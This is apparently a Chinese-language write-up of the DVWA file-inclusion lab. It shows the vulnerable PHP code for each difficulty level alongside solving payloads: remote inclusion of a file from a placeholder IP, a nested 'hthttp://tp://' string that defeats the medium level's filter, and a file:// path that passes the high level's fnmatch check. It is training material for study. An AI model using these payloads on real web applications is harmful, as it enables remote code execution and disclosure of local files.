1.low级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
分析:
没有过滤
解:
?page=http://xx.xx.xx.xx/1.txt
2.medium级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
分析:
过滤了http:// https:// …/ …
嵌套一下就能过
解:
?page=hthttp://tp://xx.xx.xx.xx/1.txt
3.high级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
分析:
fnmatch() 函数根据指定的模式来匹配文件名或字符串。
解:
file://D://1.txt
4.impossible级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
分析:
用了白名单的方式,规定了传入的参数名必须为这些。